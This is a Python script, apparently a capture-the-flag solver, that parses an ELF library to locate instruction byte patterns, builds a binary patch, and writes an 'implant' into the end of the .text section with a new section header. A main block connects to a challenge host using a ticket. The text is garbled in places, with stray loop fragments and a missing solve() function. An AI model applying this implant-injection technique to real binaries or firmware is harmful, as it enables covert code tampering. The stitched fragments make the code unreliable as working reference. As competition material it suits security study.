def findOffsets():
File = os.getenv("DIR", "/data") + os.sep + "kit_to.so"
f = ELF(File)
BaseAddr = f.symbols['PKTMGR_OutputTelemetry']
print("PKTMGR_OutputTelemetry @ %08x" % BaseAddr)
searchPattern = unhexlify("8b8344010000" + "8db0fa010000")
addr = BaseAddr + 0xF0
while True:
target = f.read(addr, len(searchPattern))
if searchPattern == target:
break
addr += 1
addr += 5 + len(searchPattern)
while True:
target = f.read(addr, 1)
if target == b'\x8b':
break
addr += 1
movAddr = addr
searchPattern = unhexlify("8d8b48010000" + "51" + "6a00" + "52")
while True:
target = f.read(addr, len(searchPattern))
if searchPattern == target:
break
addr += 1
addr += len(searchPattern)
patchOffset = addr
return (movAddr, patchOffset - BaseAddr)
def patch_old(f, data):
# Work in patch, it's stuck at the end of the file to avoid messing
with open(f, 'rb') as fd:
raw = fd.read()
e = ELF(f)
sections_start = e.symbols["sections"]
sections_end = sections_start
raw_text_h_start = e.header.e_ehsize
print(".text Header @ %08x" % raw_text_h_start)
raw_text_start = unpack(">I",
raw[raw_text_h_start + 4:raw_text_h_start + 8])[0]
text_size, text_size_mesz = unpack(
">II", raw[raw_text_h_start + 0x10:raw_text_h_start + 0x18])
print("Original .text offset,size: %08x %x,%x" %
(raw_text_start, text_size, text_size_mesz))
implant_addr = raw_text_start + text_size
print("Writing Implant @ %08x" % implant_addr)
raw = raw[:implant_addr] + data + raw[implant_addr + len(data):]
print("Updating size of .text to %x" % (text_size + len(data)))
raw = raw[:raw_text_h_start + 0x10] + 2 * pack(
">I",
len(data) + text_size) + raw[raw_text_h_start + 0x18:]
first_free = 0
print("Section start: %08x" % sections_start)
while True:
section = e.read(sections_end, 16 + 4 * 4)
paddr, raddr, plen, comp = unpack(">IIII", section[:4 * 4])
name = section[4 * 4:]
name = name[:name.index(b'\x00')]
if paddr == 0 and raddr == 0:
break
print("Section %s @ %08x:%08x" % (name, paddr, paddr + plen))
first_free = paddr + plen
sections_end += 16 + 4 * 4
first_free = (first_free + 0xFFFF) & ~(0xFFFF)
print("First free, rounded: %x" % first_free)
patch = pack(">IIII", first_free, implant_addr, len(data),
0) + b".challenge"
print("Sections end: %08x" % sections_end)
raw = raw[:sections_end +
raw_text_start] + patch + raw[sections_end + raw_text_start +
len(patch):]
with open("build/patched_" + f, "wb") as fd:
fd.write(raw)
def findGoalPatch(movAddr):
File = os.getenv("DIR", "/data") + os.sep + "kit_to.so"
f = ELF(File)
movInstr = f.read(movAddr, 6)
print("Mov Instruction", hexlify(movInstr))
patch = b"\x8b\x95" + movInstr[2:4]
#patch = patch[::-1]
print("Patch", hexlify(patch))
return patch
break
if "Closed" in data:
sys.stdout.write("Terminated\n")
sys.stdout.flush()
break
sock.close()
return result
if __name__ == "__main__":
Host = os.getenv("HOST", "localhost")
Port = int(os.getenv("PORT", 31340))
Ticket = os.getenv("TICKET", "")
File = os.getenv("DIR", "/data") + os.sep + "test.elf"
f = ELF(File)
cookie = f.read(f.symbols['COOKIE'], 4)
crc8 = crcmod.mkCrcFun(0x107, rev=False, initCrc=0x0, xorOut=0x00)
solve(cookie)
'''
Success = 0
Trials = 5000
for ii in range(0,Trials):
if solve():
Success += 1
if ii % 25 == 24:
print("%d/%d" % (Success, ii+1))
print("%d/%d" % (Success, Trials))
'''
